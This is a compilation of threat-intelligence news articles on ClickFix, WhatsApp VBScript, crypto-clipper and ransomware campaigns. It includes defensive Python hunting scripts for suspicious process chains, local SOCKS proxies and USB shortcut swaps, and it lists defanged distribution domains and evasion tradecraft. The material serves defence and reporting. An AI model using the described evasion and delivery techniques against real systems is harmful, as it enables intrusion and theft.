
ClickFix Investigation Exposes API-Driven Malware Across 3,000 Live Payloads


A growing number of ClickFix campaigns are advancing from simple social engineering tricks into highly orchestrated malware delivery operations backed by dynamic infrastructure. A recent study of nearly 3,000 ClickFix payloads reveals that attackers are using API-based delivery systems to generate a uniquely disguised malicious command for each victim while serving the same underlying malware to all of them.

Bert-Jan Pals conducted the analysis, which uncovered previously unknown techniques for evading Windows script inspection and demonstrates the deliberate efforts of threat actors to increase both detection resistance and operational scalability. The findings show how what once appeared to be a straightforward clipboard-based deception has evolved into a resilient, adaptive ecosystem that maximizes infection success even where conventional security controls are in place. They are all the more concerning because ClickFix continues to gain traction as one of the most widespread social engineering techniques.

First identified in March 2024, ClickFix has since become one of the most widely abused social engineering techniques in the cybercrime landscape. Rather than exploiting software vulnerabilities, ClickFix exploits user trust by presenting fake browser errors, anti-bot CAPTCHA challenges, security warnings, or access restrictions that appear legitimate.

Once victims complete the seemingly routine verification procedure, they have executed the attacker-supplied code themselves. According to Microsoft's Cyber Signals report for 2025, 47 percent of observed initial access incidents were attributed to ClickFix-based activity, demonstrating how prevalent deception-driven attack chains have become among malware operators.

At the center of these campaigns is an attack sequence that transforms ordinary web pages into malware launch points, and it is deceptively simple. Attackers commonly compromise legitimate websites or create convincing phishing pages, then replace verification prompts with counterfeit CAPTCHA screens that require visitors to perform a series of manual steps, including executing a command that the page has copied to the clipboard. These commands typically launch PowerShell, which retrieves and executes remote payloads, enabling the deployment of information stealers and other malicious applications.

On Windows systems, researchers observed ClickFix delivering multiple malware families, including Deepload. Researchers have also documented the technique beyond the Windows ecosystem, with the Atomic Stealer (AMOS) malware being distributed to macOS users for the first time. That stealer targets browser credentials, session cookies, cryptocurrency wallets, and Apple Keychain data, illustrating the technique's growing cross-platform reach.

ClickFix's popularity is largely attributed to its ability to bypass many of the security mechanisms organizations commonly rely on. ESET's telemetry shows that ClickFix activity increased 517 percent between late 2024 and the first half of 2025, and Microsoft's Digital Defense Report indicates that the technique accounted for 47 percent of initial access incidents investigated by its Defender Experts team in 2025. The MITRE ATT&CK framework has also given ClickFix a dedicated entry, technique T1204.004, recognising it as a distinct form of user-assisted malicious execution on the strength of its growing operational significance.

According to Pals' investigation, the most significant evolution today lies not on the phishing page itself but in backend APIs that generate payloads on demand instead of embedding static commands. The backend validates and logs each request and returns a uniquely obfuscated command on every execution, while delivering the same malware each time. In one test, a single server generated 100 distinct payloads across 100 requests by cycling through layered encoding and encryption techniques: Base64, AES, TripleDES, Rijndael, and Deflate. Once these protective layers are stripped away, the payloads currently resolve to the same PowerShell runspace script, but Pals cautions that the next step in the technique's development may be per-victim payload customization.

The platform serves lures in 25 languages and automatically tailors the payload to whether the visitor is using Windows or macOS. These findings provide further evidence of ClickFix's commercialization, which now extends beyond builder kits to API-driven payload generation. Pals also spotted a significant shift in execution tactics designed to blunt clipboard-focused detections. Newer ClickFix variants do not place the entire malicious command in the victim's clipboard; instead they first download an archive into the Windows Downloads directory and then copy only a lightweight PowerShell "orchestrator" command.

When executed, the command silently moves the archive to a temporary location, extracts its contents, and launches the embedded PowerShell script. Separating the payload from the clipboard command also makes execution more discreet, reducing its exposure to the Antimalware Scan Interface (AMSI). In earlier ClickFix campaigns, victims were instructed to paste commands into the Run dialog by pressing Windows+R, but in more recent operations observed throughout 2025 and into 2026, users were directed to Windows Terminal via Windows+X.

That method also avoids creating the RunMRU registry artifacts that forensic investigators commonly rely on, making the activity look more routine. The move from static commands to API-generated payloads marks a significant change for ClickFix campaigns: attackers keep the same underlying malware while generating uniquely obfuscated commands on demand, which complicates signature-based detection without adding operational complexity and makes campaigns more scalable and harder to identify through conventional security measures. ClickFix has also been used by state-sponsored threat groups.

According to Proofpoint threat intelligence, several state-sponsored groups have incorporated ClickFix into existing intrusion workflows, including Russia's APT28, Iran's MuddyWater, and North Korea's Kimsuky. North Korean operators have also built fraudulent recruitment schemes, known as ClickFake Interviews, that target cryptocurrency professionals. The operational scale is equally significant: security firm Expel reported that 147,521 systems may have been compromised by a single ClearFake campaign since late August 2025.

Behavioral monitoring is a more valuable defense than clipboard inspection alone. Pals found the most reliable indicators to be process chains in which explorer.exe or WindowsTerminal.exe immediately spawns powershell.exe, cmd.exe, or msiexec.exe, followed by outbound network activity. PowerShell and cmd.exe accounted for approximately 39 percent of all launch methods observed across the analyzed dataset, followed by msiexec.exe at approximately 34 percent.

Behavioral EDR, application control policies, and continued user awareness remain among the most effective defenses. The Downloads-folder technique presents another hunting opportunity: it relies on seemingly benign one-line commands that access the Downloads directory before initiating concealed PowerShell execution.
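The process-chain and Downloads-folder indicators described above, turned into a small hunting rule over constructed telemetry. This is an added example, not code from the original post or from Pals' analysis; the event schema (ts, event, pid, image, parent_image, cmdline, dest) and the sample records are assumptions.

```python
"""Hunt for ClickFix-style execution chains in process and network telemetry.

Added example; not from the original post or Pals' research. The event
schema below (ts, event, pid, image, parent_image, cmdline, dest) is an
assumption, as are the constructed sample records.
"""
from __future__ import annotations

import ntpath
import re

# Parents and children named in the article as the most reliable chain.
LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "msiexec.exe"}
NETWORK_WINDOW_S = 30.0  # outbound connection must follow the spawn within this window
# A command line touching the user's Downloads folder (the "orchestrator" pattern).
DOWNLOADS_RE = re.compile(r"(\\|/)downloads\b", re.IGNORECASE)

# Constructed telemetry (not real logs): an admin session, a ClickFix-like chain,
# a service-spawned installer, and a Downloads-folder one-liner.
EVENTS = [
    {"ts": 100.0, "event": "process", "pid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Projects"},
    {"ts": 205.0, "event": "process", "pid": 5120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
     "cmdline": r'powershell -w h -c "Move-Item $env:USERPROFILE\Downloads\verify.zip $env:TEMP"'},
    {"ts": 207.5, "event": "network", "pid": 5120, "dest": "203.0.113.10:443"},
    {"ts": 300.0, "event": "process", "pid": 6001,
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": "msiexec.exe /V"},
    {"ts": 400.0, "event": "process", "pid": 7007,
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd /c dir "%USERPROFILE%\Downloads"'},
]


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def find_clickfix_chains(events, window: float = NETWORK_WINDOW_S):
    """Return (pid, parent, child, reasons) for spawns matching the hunt criteria.

    A launcher->interpreter spawn is reported when the child makes an outbound
    connection within `window` seconds, or when its command line references
    the Downloads folder (the latter is a hunting lead, not proof of compromise).
    """
    ordered = sorted(events, key=lambda e: e["ts"])
    network = [e for e in ordered if e["event"] == "network"]
    alerts = []
    for ev in ordered:
        if ev["event"] != "process":
            continue
        parent, child = _name(ev["parent_image"]), _name(ev["image"])
        if parent not in LAUNCHERS or child not in INTERPRETERS:
            continue
        reasons = []
        if any(n["pid"] == ev["pid"] and ev["ts"] <= n["ts"] <= ev["ts"] + window
               for n in network):
            reasons.append("interpreter made an outbound connection right after launch")
        if DOWNLOADS_RE.search(ev["cmdline"]):
            reasons.append("command line references the Downloads folder")
        if reasons:
            alerts.append((ev["pid"], parent, child, reasons))
    return alerts


if __name__ == "__main__":
    for pid, parent, child, reasons in find_clickfix_chains(EVENTS):
        print(f"pid {pid}: {parent} -> {child}: {'; '.join(reasons)}")
```

The benign explorer.exe -> powershell.exe session is not reported because it neither touches Downloads nor connects out, while the Windows Terminal chain matches on both counts.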

According to Pals, three active payload distribution servers were identified during the investigation - comicstar[.]lat, babybon[.]cfd, and merkantalolol[.]asia. Communication with these domains does not by itself indicate a successful compromise, but rather that ClickFix commands have been delivered to a user's clipboard. Built on API-driven payload infrastructure, ClickFix is believed to have evolved into a flexible attack framework.

Pals warns that the next major development will likely be the transition from individual payload wrappers to malware tailored to each target. This evolution of ClickFix illustrates the broader shift in cybercrime towards highly adaptable, service-driven attack ecosystems that emphasize flexibility, scale, and evasion. Because payload delivery is dynamic, organizations cannot rely solely on static indicators or traditional prevention measures to protect themselves.

Continuous monitoring of user-driven execution chains, stronger application controls, and sustained security awareness remain critical to disrupting attacks designed to blend into legitimate activity. In an environment where threat actors constantly refine successful techniques, organizational resilience will depend on the ability to detect behaviors rather than on keeping up with ever-changing payloads.

WhatsApp Malware Campaign Targets Global Users Through Fake Financial Documents and Remote Access Tools


A widespread malware campaign is targeting WhatsApp users across several countries by sending deceptive messages containing malicious VBScript files that can ultimately grant attackers remote access to victims' systems.

According to cybersecurity researchers at Kaspersky, the threat actors behind the campaign are disguising the malicious files as legitimate business and financial documents. These files are distributed through WhatsApp accounts that have already been compromised, making the messages appear trustworthy to recipients.

Once a victim downloads and executes the attachment, a multi-stage infection process begins. The attack eventually installs ManageEngine Endpoint Central, a legitimate system management tool commonly used by IT administrators to oversee devices from a centralized platform.

Kaspersky’s telemetry data indicates that the campaign has impacted users in Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia.

The attack starts with WhatsApp messages sent from compromised accounts. These messages typically contain only a heavily obfuscated VBScript file designed to evade detection.

To increase the likelihood of users opening the attachment, the files are named to resemble invoices, financial reports, billing records, account notifications, and other business-related documents. Researchers also observed that the filenames are adapted to different languages, highlighting the global nature of the operation.

“Based on evidence collected from multiple victims through social media reports and submitted samples, we can conclude that the threat actor had gained access to several WhatsApp accounts and used them to distribute the malicious VBScript files to contacts on the compromised users’ contact lists,” Kaspersky explains.

“At the time of writing, the exact method used to compromise these WhatsApp accounts remains unknown.”

If a Windows user opens the malicious file, the VBScript downloads two additional scripts from attacker-controlled servers. These scripts modify the Windows Registry to disable User Account Control (UAC) protections and retrieve a ZIP archive containing ManageEngine Endpoint Central.

The software is then installed silently in the background and configured to connect with servers controlled by the attackers. This setup provides cybercriminals with remote administration capabilities over the compromised machine.

Researchers noted a difference in execution behavior depending on the WhatsApp platform being used. When the file is received through WhatsApp Web, it must first be downloaded before execution. However, in the WhatsApp Desktop application, the file can be launched directly through Windows Script Host (wscript.exe).

Although Kaspersky has not attributed the campaign to a specific threat actor, investigators identified indicators suggesting the use of the Chinese language and found overlaps between the campaign’s infrastructure and IP addresses previously linked to ValleyRAT and Gh0st RAT operations.

Despite these findings, researchers emphasized that the available evidence is not sufficient to confidently identify the group responsible for the attacks.

Security experts advise WhatsApp users to exercise caution when receiving files, even from known contacts, as compromised accounts can be used to spread malware.

Users should verify unexpected attachments through an alternative communication channel before opening them. Additionally, all downloaded files should be scanned with an updated antivirus solution to help detect and block potential threats before execution.

Crypto Heist Uses Fake Reputation Campaign to Spread Malware


Cybercriminals are increasingly borrowing the language and tactics of public relations, and a new campaign shows how effective that can be. According to researchers, attackers promoted malicious crypto-related tools by creating a polished online presence across GitHub, YouTube, VirusTotal, and other channels. The goal was not only to spread malware, but also to build an illusion of trust that would lower suspicion among users and researchers.

At the center of the operation was a Rust-based clipboard hijacker, a type of malware that watches for cryptocurrency wallet addresses copied into a victim’s clipboard. When it detects one, it swaps the address with one controlled by the attackers, causing funds to be sent to the wrong destination. This simple trick can be highly profitable because it targets users at the exact moment they think they are making a legitimate transfer. 

What makes the campaign notable is its layered distribution strategy. Researchers found dedicated phishing pages, fake GitHub and SourceForge projects, and even a YouTube channel designed to make the software look popular and credible. The channel reportedly used AI-generated narrators, suspicious view spikes, and enthusiastic comments that were likely coordinated to reinforce the appearance of real demand. Instead of relying on one channel, the attackers created a network of signals that seemed to validate one another. 

The operation also extended into reputation manipulation on security platforms. By using large numbers of fake accounts, sometimes described as “Ghost Networks,” the attackers attempted to influence systems such as VirusTotal and make their tools appear harmless or merely falsely flagged. That tactic matters because many users and even defenders glance at reputation data before deciding whether a file is safe. If the data is polluted, the warning signs become harder to trust. 

This campaign shows how malware distribution is evolving beyond obvious spam and sketchy downloads. Attackers now understand that credibility itself can be weaponized, especially when users rely on social proof, star ratings, comments, and public scans to judge safety. The result is a more convincing, more scalable deception that blends technical abuse with marketing-style manipulation. 

For users, the lesson is to treat polished packaging as a warning sign rather than reassurance. Check the source of any crypto tool carefully, verify wallet addresses before sending money, and avoid downloading software because it looks popular or well reviewed. For defenders, the case is a reminder that reputation systems can be gamed, so detection must look beyond surface-level trust signals.

CryptoBandits Malware Combines Crypto Theft and Backdoor Access


Microsoft has disclosed details of a newly identified Windows malware campaign that combines cryptocurrency theft, covert command-and-control communications, and remote access capabilities, creating a threat that extends well beyond traditional crypto-stealing malware.

Tracked as CryptoBandits, the malware has been active since at least February 2026 and is designed to compromise Windows systems through malicious shortcut (LNK) files. While its primary objective is to steal cryptocurrency-related information, Microsoft researchers found that the malware also functions as a lightweight backdoor, allowing attackers to maintain ongoing access to infected devices and issue remote commands.

According to Microsoft's analysis, the threat relies heavily on built-in Windows scripting technologies, including Windows Script Host and ActiveX components, to execute malicious actions while avoiding more obvious indicators typically associated with conventional malware families. Once executed, CryptoBandits deploys a portable version of the Tor anonymity network and establishes communications with attacker-controlled hidden services through a local SOCKS5 proxy, concealing the infrastructure used to manage infected systems.

Researchers observed the malware being distributed through malicious shortcut files that masquerade as legitimate content. After compromising a system, CryptoBandits deploys two distinct modules: a worm component responsible for spreading the infection and a cryptocurrency clipper designed to monitor and manipulate wallet-related data.

The propagation mechanism enables the malware to scan connected USB storage devices and generate additional malicious shortcut files that imitate legitimate documents. By replacing or disguising genuine files with weaponized shortcuts, attackers increase the likelihood that the malware will spread when removable media is shared between systems. Microsoft also noted that the malware can deploy additional payloads while excluding them from Microsoft Defender scanning, helping attackers reduce the likelihood of detection.

One of the most dangerous aspects of CryptoBandits is its clipboard-monitoring functionality. Cryptocurrency clippers are designed to watch for wallet addresses copied by victims during transactions. When a targeted wallet address is detected, the malware silently replaces it with an attacker-controlled address before the victim pastes the information into a cryptocurrency application or exchange platform. Because cryptocurrency addresses are often long and difficult to verify manually, victims may unknowingly transfer digital assets directly to criminal-controlled wallets.

Beyond address substitution, Microsoft found that the malware can harvest cryptocurrency seed phrases and private keys, information that can provide direct access to digital wallets. The malware also captures screenshots and transmits collected information to attacker-controlled infrastructure through Tor-based communications channels.

The malware establishes persistence through scheduled tasks and incorporates anti-analysis checks intended to identify whether system monitoring tools are active. Researchers observed the clipper verifying whether Windows Task Manager was running before continuing execution, a technique commonly used by malware operators attempting to evade investigation and detection.

After installation, CryptoBandits launches a renamed Tor executable and registers the infected device with its command-and-control infrastructure. The malware then continuously polls its operators for instructions at intervals of roughly 500 milliseconds, enabling rapid execution of attacker-issued commands. This capability transforms the malware from a simple financial stealer into a remotely managed backdoor capable of supporting additional malicious activity.

Microsoft's investigation also revealed extensive use of runtime obfuscation. Core malware components remain encrypted until execution, while both the Python-based installation routines and JavaScript payloads are intentionally obscured to complicate reverse engineering efforts. Such techniques make static analysis significantly more difficult and can delay detection by traditional signature-based security tools.

At the center of the operation is the malware's bundled Tor client. Rather than relying on exposed internet-facing servers, CryptoBandits routes traffic through localhost:9050 using a SOCKS5 proxy and communicates with hidden-service infrastructure hosted within the Tor network. By concealing command-and-control traffic behind anonymized routing, attackers reduce network visibility and make infrastructure disruption efforts considerably more challenging.

The campaign illustrates a broader trend in financially motivated cybercrime, where lightweight malware increasingly combines credential theft, cryptocurrency targeting, covert communications, and remote-access functionality within a single package. Security researchers have repeatedly observed threat actors moving away from easily identifiable command-and-control servers in favor of anonymized infrastructure that blends malicious traffic with legitimate network activity.

To mitigate the threat, Microsoft recommends restricting unnecessary use of scripting engines such as Windows Script Host, monitoring systems for unauthorized local SOCKS proxy activity, reviewing unusual clipboard access patterns, and implementing behavioral detection mechanisms capable of correlating script execution, network communications, process activity, and data exfiltration attempts. Additional safeguards include disabling autorun functionality for removable media, restricting execution of shortcut files from USB devices, and closely monitoring Tor-related network traffic originating from enterprise endpoints.
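Two of the mitigations listed above, watching for unauthorized local SOCKS proxies and for scripting-engine abuse, combined into one check over constructed records. This is an added example and not Microsoft's detection logic; the record schema and the approved Tor directory are assumptions, port 9050 comes from the article, and the greeting check follows the RFC 1928 SOCKS5 client hello.

```python
"""Flag Windows Script Host processes talking to a local SOCKS proxy.

Added example; not Microsoft's detection logic. The record schema and the
approved Tor directory below are assumptions; port 9050 is the port named in
the article, and the greeting check follows the RFC 1928 SOCKS5 client hello.
"""
from __future__ import annotations

import ntpath

SOCKS_PORTS = {9050, 9150}                      # 9050 is the port named in the article
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows Script Host binaries
# Assumed allow-list: where a sanctioned Tor client is permitted to live.
APPROVED_TOR_DIRS = ("c:\\program files\\tor browser\\",)


def is_socks5_hello(data: bytes) -> bool:
    """RFC 1928 client greeting: VER=0x05, NMETHODS, then exactly NMETHODS bytes."""
    return len(data) >= 2 and data[0] == 0x05 and len(data) == 2 + data[1]


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def find_local_socks_abuse(listeners, connections):
    """Return (pid, image, port, reasons) for suspicious loopback SOCKS usage.

    A connection is reported when the listener on that port is not an approved
    Tor install, or when the client is a script host; a SOCKS5 greeting in the
    first bytes is added as corroboration but never alerts on its own.
    """
    by_port = {l["port"]: l for l in listeners if l["addr"] == "127.0.0.1"}
    alerts = []
    for c in connections:
        if c["dest_addr"] != "127.0.0.1" or c["dest_port"] not in SOCKS_PORTS:
            continue
        reasons = []
        lst = by_port.get(c["dest_port"])
        if lst is not None and not lst["image"].lower().startswith(APPROVED_TOR_DIRS):
            reasons.append(f"listener {lst['image']} is not an approved Tor install")
        if _name(c["image"]) in SCRIPT_HOSTS:
            reasons.append("client is a Windows Script Host process")
        if reasons and is_socks5_hello(c["first_bytes"]):
            reasons.append("first bytes are a SOCKS5 client greeting")
        if reasons:
            alerts.append((c["pid"], _name(c["image"]), c["dest_port"], reasons))
    return alerts


# Constructed records (not real telemetry): a renamed binary listening on 9050
# from a Public Documents staging directory, a legitimate Tor Browser on 9150,
# and an unrelated loopback connection.
LISTENERS = [
    {"pid": 900, "addr": "127.0.0.1", "port": 9050,
     "image": r"C:\Users\Public\Documents\k3j9\svchost.exe"},
    {"pid": 701, "addr": "127.0.0.1", "port": 9150,
     "image": r"C:\Program Files\Tor Browser\Browser\TorBrowser\Tor\tor.exe"},
]
CONNECTIONS = [
    {"pid": 1234, "image": r"C:\Windows\System32\wscript.exe", "dest_addr": "127.0.0.1",
     "dest_port": 9050, "first_bytes": b"\x05\x01\x00"},
    {"pid": 2345, "image": r"C:\Program Files\Tor Browser\Browser\firefox.exe",
     "dest_addr": "127.0.0.1", "dest_port": 9150, "first_bytes": b"\x05\x01\x00"},
    {"pid": 3456, "image": r"C:\Windows\System32\svchost.exe", "dest_addr": "127.0.0.1",
     "dest_port": 5357, "first_bytes": b"GET / HTTP/1.1\r\n"},
]

if __name__ == "__main__":
    for pid, image, port, reasons in find_local_socks_abuse(LISTENERS, CONNECTIONS):
        print(f"pid {pid} ({image}) -> 127.0.0.1:{port}: {'; '.join(reasons)}")
```

The Tor Browser connection on 9150 stays quiet because its listener is allow-listed and the client is not a script host, so only the wscript.exe session to the unapproved 9050 listener is reported.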

New Prinz Eugen Ransomware Targets Recently Modified Files First, Researchers Find


Security researchers have revealed a ransomware operation known as Prinz Eugen that employs an unusual file-encryption strategy designed to increase pressure on victims. According to an investigation by ThreatDown, Malwarebytes' enterprise security division, the malware gives priority to files that have been modified most recently, focusing its efforts on data that organizations are most likely to rely on for day-to-day operations.

Researchers describe the actors behind Prinz Eugen as highly interactive intruders who rely on direct involvement throughout the attack process rather than fully automated deployment methods. Instead of depending on large-scale ransomware affiliate networks, the group appears to conduct attacks manually, using legitimate administration tools and built-in system utilities to move through victim environments and maintain access.

Evidence collected during incident response investigations suggests that attackers may initially gain entry through compromised Remote Desktop Protocol (RDP) credentials. After securing access, operators manually retrieve and launch the ransomware payload, identified as servertool.exe. In one investigated intrusion, researchers observed the use of the RemotePC remote management platform, alongside the creation of a backdoor administrator account that allowed the attackers to retain access to the compromised environment.

ThreatDown noted that Prinz Eugen does not currently appear to operate under the ransomware-as-a-service model that has become common across the cybercriminal ecosystem. Researchers found no indication that the group's operators are actively recruiting affiliates or distributing their malware to external partners. Instead, available evidence points to a more centralized operation in which attacks are carried out directly by the threat actors themselves.

Although the group's data-leak platform presently displays only three victims, researchers believe the actual number of affected organizations is higher. Information gathered during investigations indicates that multiple organizations have experienced incidents linked to the ransomware. Depending on the attack, victims may face file encryption, data theft, or a combination of both. Security researchers have identified at least five organizations impacted by the operation, including an incident involving Standard Bank, where attackers reportedly demanded a ransom payment of one Bitcoin. The demand was ultimately rejected.

One of the most distinctive characteristics of Prinz Eugen is its approach to selecting files for encryption. Analysis of the malware revealed that it processes files according to modification time, encrypting the most recently changed data before moving to older content. When several files share the same timestamp, the malware follows alphabetical order to determine which file is processed next.

Researchers believe this strategy is intended to maximize operational disruption. Files that have been edited recently are often associated with ongoing business activities, active projects, financial records, or other information that employees depend on regularly. By rendering this data inaccessible first, attackers can create immediate pressure on organizations to engage with extortion demands.

Technical analysis further showed that the ransomware scans directories recursively without imposing depth restrictions. Unlike some ransomware families that avoid certain locations or system folders, the examined Prinz Eugen sample applies very few limitations. The malware attempts to encrypt virtually every accessible file it encounters, excluding only files that already carry the .prinzeugen extension, which is added to data after encryption has been completed.

The encryption mechanism itself incorporates multiple modern cryptographic components. Researchers found that the ransomware uses the ChaCha20-Poly1305 algorithm together with a 32-byte master key. Each targeted file receives its own randomly generated initialization vector, while key generation and derivation processes rely on Argon2id, SHA-256, and HKDF-SHA256. Data is encrypted in 1 MB segments, and SHA-256 hashing is used to verify file integrity throughout the process.

Investigators also identified a safeguard built into the malware's deletion routine. When operators use the --delete option, the ransomware removes original files only after confirming that the encrypted version can be successfully decrypted. This verification step reduces the likelihood of accidental data destruction that could undermine the attackers' leverage over victims.

Beyond encrypting files, Prinz Eugen incorporates measures intended to frustrate forensic investigations. Researchers observed that the malware overwrites encryption keys with zero values once they are no longer needed, triggers garbage collection routines to remove remaining traces from memory, and then attempts to delete itself from disk. These actions are designed to make post-incident analysis and key recovery efforts more difficult.

Another noteworthy aspect of the ransomware is the absence of conventional extortion artifacts. The analyzed sample contains no functionality for dropping a ransom note onto infected systems, nor does it alter the victim's desktop wallpaper to display payment instructions. While such techniques have historically been common among ransomware groups, ThreatDown researchers noted that some organized operations are increasingly shifting away from visible on-system communications.

Instead, attackers may conduct negotiations through external channels such as email correspondence, direct phone contact, or dedicated dark-web portals. By moving communications outside the compromised environment, threat actors leave behind fewer artifacts that investigators can collect and reduce opportunities for automated security tools to identify the extortion phase of an attack.

To assist defenders, ThreatDown has published a collection of indicators of compromise associated with Prinz Eugen activity. These indicators can help security teams, incident responders, and researchers identify potential infections, investigate suspicious activity, and strengthen defenses against future attacks involving the ransomware. 

INC Ransomware Climbs Into Top Tier of Cybercrime Operations, Surpasses 830 Victims


The ransomware operation known as INC has grown into one of the most active cybercrime groups of 2026, with security researchers linking it to more than 830 victims since it first appeared in August 2023.

According to researchers at Acronis, the group's rise coincided with disruptions affecting major ransomware brands such as LockBit and BlackCat. As affiliates sought alternative platforms, INC appears to have benefited from that shift. More than 65% of the victims listed by the group are based in the United States, with legal firms, healthcare providers, manufacturers, construction companies, and technology organizations among the most frequently targeted sectors.

Researchers also observed major changes to the ransomware itself. INC's malware for Windows and Linux/VMware ESXi systems has been rewritten in Rust, a programming language increasingly adopted by malware developers because it supports multiple operating systems and can complicate reverse-engineering efforts.

The group's toolkit has expanded as well. Recent attacks have involved a credential-stealing utility capable of extracting authentication data from newer Veeam backup deployments that use salted DPAPI encryption. Access to backup infrastructure can give attackers valuable credentials while also making recovery efforts more difficult for victims.

Acronis noted that the sale of INC's Windows and Linux ransomware variants on underground cybercrime forums in May 2024 contributed to the appearance of related ransomware families, including Lynx and Sinobi. Researchers identified significant code similarities between the groups.

Investigators found that INC affiliates rely on several entry points to compromise networks, including spear-phishing campaigns, credentials purchased from Initial Access Brokers (IABs), and the exploitation of publicly exposed systems running vulnerable versions of Citrix NetScaler, Fortinet EMS, and SimpleHelp software.

Once inside a network, attackers harvest credentials, move between systems using legitimate administrative tools such as RDP and PsExec, and attempt to weaken security controls through a technique known as Bring Your Own Vulnerable Driver (BYOVD). Researchers observed the use of vulnerable drivers including filwfp.sys, filnk.sys, and fildds.sys. The group also deploys tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer to maintain access and control compromised environments.

Before encryption begins, stolen files are collected and transferred using Rclone, often after being packaged into password-protected archives. The ransomware then encrypts systems using multithreading and partial-encryption techniques to speed up the process. When launched against VMware ESXi environments, the malware can also attempt to shut down virtual machines.

Data from ZeroFox ranked INC as the fourth most active ransomware operation during the first quarter of 2026, recording more than 120 incidents. Researchers said the group's growth demonstrates how ransomware operators can build large-scale campaigns using widely available tools, stolen credentials, and unpatched systems rather than relying on highly specialized malware.

Microsoft Exposes Malware Operation Combining USB LNK Worms and Tor-Based C2 Servers


Combining cryptocurrency theft, covert communications, and remote access into a single malware framework gives a threat actor greater stealth and persistence. Microsoft has revealed a Windows-based clipper campaign, active since February 2026, that uses a portable Tor client, Windows Script Host, and ActiveX components to communicate with a hidden command-and-control server.

Besides intercepting and replacing cryptocurrency wallet addresses, the malware continuously monitors the clipboard, captures screenshots, exfiltrates stolen data, and executes remote commands. 

A key characteristic of the operation is that it uses neither a traditional installer nor publicly exposed C2 servers; instead, it routes traffic through Tor to conceal its activity, and its capabilities extend beyond financial theft to lightweight backdoor functions.

USB-Borne Infection Chain Drives Initial Compromise

Further investigation revealed a multi-stage infection chain that combines removable-media propagation with credential and asset theft. 

According to Microsoft, the campaign originated with malicious Windows shortcut (.LNK) files distributed on USB storage devices, allowing the malware to spread without relying on online delivery mechanisms. Once executed, the infection deploys two components: a worm that propagates to additional removable drives, and a clipper module designed to capture cryptocurrency seed phrases, private keys, and wallet addresses. 

Obfuscation and Persistence Mechanisms Enhance Stealth

As part of its propagation mechanism, the worm exploits users' trust in familiar file formats. It scans USB devices for commonly used document formats such as Microsoft Word, Excel, and PDF, hides the original files, and replaces them with malicious shortcuts bearing identical names. 

Beyond increasing the chance of user interaction, this strategy masks the infection process: upon execution, additional payloads are unpacked into randomly named directories under the Public Documents path, and persistence is established through scheduled tasks. To reduce the likelihood of detection, the malware also attempts to weaken local defenses by creating antivirus exclusions for its staging locations and executable components. 
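The document-to-shortcut swap described above leaves a recognisable pattern on the drive: a .lnk file whose display name matches a document in the same folder. The following triage script is an added example, not Microsoft's code or anything from the report; the directory layout it builds is constructed for the demonstration, and the list of targeted document types is taken from the article.

```python
"""Triage a copied USB drive for documents shadowed by same-named .lnk shortcuts."""
import os
import tempfile
from pathlib import Path

# Document types the worm is reported to target (per the article above).
DOCUMENT_SUFFIXES = {".doc", ".docx", ".xls", ".xlsx", ".pdf"}


def find_shortcut_swaps(root):
    """Return sorted (shortcut, shadowed_document) pairs found under root.

    A shortcut counts as suspicious when a targeted document in the same
    folder shares its display name: either the full name ("Invoice.pdf"
    next to "Invoice.pdf.lnk", which Explorer shows as "Invoice.pdf" when
    extensions are hidden) or the bare stem ("Budget.xlsx" next to
    "Budget.lnk"). Hidden attributes are ignored so the check also works
    on a forensic copy that lost them.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        docs = [Path(dirpath, f) for f in files
                if Path(f).suffix.lower() in DOCUMENT_SUFFIXES]
        for f in files:
            lnk = Path(dirpath, f)
            if lnk.suffix.lower() != ".lnk":
                continue
            display = lnk.stem.lower()  # name as shown with .lnk hidden
            for doc in docs:
                if display in (doc.name.lower(), doc.stem.lower()):
                    hits.append((str(lnk), str(doc)))
    return sorted(hits)


def build_sample_drive():
    """Create a constructed directory layout imitating an infected USB stick."""
    root = Path(tempfile.mkdtemp(prefix="usb_triage_"))
    (root / "sub").mkdir()
    for rel in ["Invoice.pdf", "Invoice.pdf.lnk",      # full-name shadow
                "sub/Budget.xlsx", "sub/Budget.lnk",   # bare-stem shadow
                "Readme.txt", "Readme.lnk",            # not a targeted type
                "Setup.lnk"]:                          # no document at all
        (root / rel).write_bytes(b"sample")
    return str(root)


if __name__ == "__main__":
    for shortcut, doc in find_shortcut_swaps(build_sample_drive()):
        print(f"SUSPICIOUS: {shortcut} shadows {doc}")
```

Run it against a mounted or imaged drive by passing the mount point to `find_shortcut_swaps`; the two hits from the sample layout are the shapes to expect, while a lone shortcut with no document beside it is left for manual review rather than flagged.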

According to Microsoft, extensive effort has gone into obstructing forensic analysis, including packaging the installer with PyInstaller, obfuscating it with PyArmor, and using JavaScript-based modules with layered encryption and runtime decryption. The malware also performs an anti-analysis check, searching for Windows Task Manager processes and terminating if monitoring is detected, underscoring the operator's emphasis on long-term stealth and evasion. 

Tor-Based Communications Power Clipboard Hijacking Operations

After clearing the anti-analysis checks and activating the stealer module, the malware enters a highly automated surveillance phase designed to detect and intercept cryptocurrency-related activity in near real time. Microsoft observed that the component uses a Tor executable named ugate.exe to communicate with its hidden command-and-control infrastructure, routing all traffic through anonymized channels.

Once installed, the malware polls the system clipboard every 500 milliseconds for a specific set of high-value cryptocurrency artifacts. These include 12-word and 24-word Bitcoin recovery phrases, Ethereum private keys, Bitcoin wallet import format (WIF) keys, and wallet addresses for Tron and Monero as well as Bitcoin legacy, P2SH, Bech32, and Taproot formats. 

